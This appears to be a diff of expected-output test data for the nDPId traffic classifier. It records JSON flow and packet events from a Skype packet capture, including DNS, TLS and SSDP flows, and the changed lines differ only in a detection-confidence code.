{"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1431969643037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969643037,"pkt":"0NQSxnP1PBXCt3IOCABFAABEXycAAEARmA7AqAEiwKgBAcqnADUAMDQMD6ABAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643037,"flow_last_seen":1431969643037,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969643037,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjuUAAEARaFTAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZzYAAEARkAPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431969643092,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969643092,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1yqcAQLnbD6CBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAgABBfOIaY="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABDNYcAAEARwa\/AqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABD3H8AAEARGrfAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7eVIAAEARfezAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 
@@ -82,10 +82,10 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431969643971,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969643971,"pkt":"0NQSxnP1PBXCt3IOCABFAABLW5oAAEARm5TAqAEiwKgBAeuAADUAN9PqYyoBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431969643972,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969643972,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe5YAAEARe5jAqAEiwKgBAeF+ADUAN7bIb04BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431969644054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969644054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xBwAAEARMyPAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXA0AAEARmyzAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi\/oAAEARaz\/AqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
@@ -106,89 +106,89 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431969646148,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969646148,"pkt":"0NQSxnP1PBXCt3IOCABFAABLNJ0AAEARwpHAqAEiwKgBAeF+ADUAN7bIb04BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00829{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431969648258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1431969648258,"pkt":"AQBef\/\/6oPPBbTu2CABFAAE\/AooAAAQRAYTAqAD+7\/\/\/+gQBB2wBK+71Tk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cG5wOnJvb3RkZXZpY2UNCg0K"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431969648274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1431969648274,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRAosAAAQRAXHAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"} 00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431969648291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"thread_ts_msec":1431969648291,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHAowAAAQRATrAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7580000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 